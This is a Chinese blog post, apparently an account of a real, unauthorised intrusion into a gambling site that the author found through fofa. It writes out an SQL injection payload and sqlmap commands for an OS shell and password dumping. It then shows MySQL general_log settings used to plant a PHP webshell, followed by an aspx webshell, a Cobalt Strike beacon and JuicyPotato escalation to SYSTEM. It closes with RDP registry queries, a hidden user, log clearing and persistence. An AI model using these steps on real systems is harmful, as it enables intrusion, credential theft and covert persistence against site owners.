实战|对某棋牌站的一次getshell 不念不忘少年蓝@ 2022-10-30 07:25 146阅读 0赞 # 起因 # 最近在fofa翻目标C段的时候,碰巧看到了这个站便记了下来,等下班回家后直接拿下。 ![图片][37af16cf204843fcbbbd4f4558313a23.png] # 目标环境信息 # BC类的活动页很多都是thinkphp二改的站,我们主要确定当前tp的版本号。 > http://www.abc.com/index.php?s=1 ![图片][faf1745eef690fa1edf9b97323ab3ad9.png] 目标环境信息 * Windows * ThinkPHP v.3.2.3 * 开启Debug模式 * 网站绝对路径 D:\\web1\\abc.com\\wwlsoeprsueords\\ 用工具扫描日志文件 ![图片][612d3f2f3c18c7723940eeab9bee3563.png] tp3注入漏洞不存在,日志文件在/addons/Runtime/Logs/admin/路径下,但并没有扫到任何的日志文件,猜测日志文件可能为另外一个命名格式 > eg. 1606510976-20\_11\_28.log > > 时间戳-年\_月\_日.log 该站点没有CDN,在fofa上搜IP发现999端口为phpmyadmin页面 ![图片][2a1a73035f5145f0408476c2dc6597c8.png] 寻找注入 一般来说,这类的活动推广页申请进度查询是存在注入的,用burp抓包 ![图片][26cffae1a234ba8b4503ac1e5cdc475e.png] payload如下: > username=123' and (extractvalue(1,concat(0x7e,(select user()),0x7e))))--+&id=13 果不其然,存在注入,还是root权限,直接就上sqlmap跑 > python3 sqlmap.py -r 1.txt --random-agent --dbms=mysql --os-shell ![图片][cd443cc8e7a4fb6fb60cbaa049c222e0.png] 还跑了几种其他类型的注入,但我们直接--os-shell报错,尝试了几次都一样返回No output,猜测可能有某种防护产品。 getshell 前面我们有找到phpmyadmin页面,我们枚举数据库账户和密码 > python3 sqlmap.py –r 1.txt --string="Surname" --users --password ![图片][86222040e9403cb1ea59d610fbab6883.png] 并且已经帮我们解码明文了,root账号登录后报错\#1045 无法登录服务器,换成dog1账号登录成功 phpmyadmin写shell: * 导出文件 * 写日志文件 > SHOW GLOBAL VARIABLES LIKE "%secure%"; > 当secure\_file\_priv的值为null,表示限制mysql不允许导入|导出 > > 当secure\_file\_priv的值没有具体值时,表示不对mysql的导入|导出做限制 ![图片][67f5e0ef1810cfe78156d187a7632826.png] 用命令打开日志保存状态,设置日志保存路径 > set global general\_log = "ON"; > > set global general\_log\_file='D:/web1/abc.com/robots.php'; 在sql查询语句处执行我们的php一句话,然后用蚁剑去连日志文件robots.php即可getshell ![图片][4eff53525312b0a5828ab9796ae24c43.png] # 绕过限制上线cs # 查看phpinfo(),发现ban了成吨的函数,无法执行命令。 ![图片][35b1a823bf404dddde32c439ed93e8bc.png] 我们可以上传aspx马进行绕过,这里我使用的是冰蝎3的aspx马 ![图片][be60864301258951b33b511f2b21be21.png] 现在可以执行命令了,但还是无法查看相关文件夹等其他问题。 ![图片][9bcf3aaa3fa450862c7da51f76e87ce3.png] 查看系统有无杀软,准备上线 > tasklist /svc ![图片][e12086132dd70587126b4151dae43767.png] 没有任何杀软,用cs生成exe上传到根目录,然后启动执行上线 ![图片][8cf73f59044c6b687dcb0bdc78ce079d.png] 用烂土豆可以直接提到`system`权限 ![图片][c023eb741326499166a57072cdc17b66.png] 直接通过注册表查是否开启3389,端口号是多少 > REG QUERY "HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections \# 查看RDP服务是否开启:1关闭,0开启 > > REG QUERY "HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v PortNumber \# 查看RDP服务的端口 ![图片][055cb7cdbf63b9ce3efb1654890f1a3a.png] 建一个隐藏用户直接远程登录过去,清除日志,做自启动,拿下该站点 ![图片][eac91c5bb05b2b1bc95cc45c2505b730.png] [37af16cf204843fcbbbd4f4558313a23.png]: /images/20221024/f8d16f5254044e02918525f684296746.png [faf1745eef690fa1edf9b97323ab3ad9.png]: /images/20221024/8f768e0bc43c4a509c3e3c1a2e0c545e.png [612d3f2f3c18c7723940eeab9bee3563.png]: /images/20221024/2c20f4d98ce545e59019d52f464cbeb0.png [2a1a73035f5145f0408476c2dc6597c8.png]: /images/20221024/41049a33e0d443dfad1998db7052d651.png [26cffae1a234ba8b4503ac1e5cdc475e.png]: /images/20221024/249f0aadefcd4fafa10d540f7e4cd128.png [cd443cc8e7a4fb6fb60cbaa049c222e0.png]: /images/20221024/80ccbd417bf3400fbf0874bccf0dc914.png [86222040e9403cb1ea59d610fbab6883.png]: /images/20221024/53b841fa19764ba386bfb7d4e30119c3.png [67f5e0ef1810cfe78156d187a7632826.png]: /images/20221024/98ccd32c853b4f34a21aeb9b408fd547.png [4eff53525312b0a5828ab9796ae24c43.png]: /images/20221024/c2e244ad449143cd8e86a7c3627a6b68.png [35b1a823bf404dddde32c439ed93e8bc.png]: /images/20221024/219213fe8b81486684f3caa1401fbb28.png [be60864301258951b33b511f2b21be21.png]: /images/20221024/452c8565feef49ada16dfcfd6adec5d4.png [9bcf3aaa3fa450862c7da51f76e87ce3.png]: /images/20221024/c2c56a54da4b4e5f8e976dbdaf204af6.png [e12086132dd70587126b4151dae43767.png]: /images/20221024/a1379e19a3d5451a96b10e6d802bd199.png [8cf73f59044c6b687dcb0bdc78ce079d.png]: /images/20221024/027ffeb38a6a430680649d55274d6d86.png [c023eb741326499166a57072cdc17b66.png]: /images/20221024/23d59316eb4e4712b560310925607ccf.png [055cb7cdbf63b9ce3efb1654890f1a3a.png]: /images/20221024/cea2266c026a427c843d7d5a907543d4.png [eac91c5bb05b2b1bc95cc45c2505b730.png]: /images/20221024/802b749ea183448daa81c2b5265228cb.png
还没有评论,来说两句吧...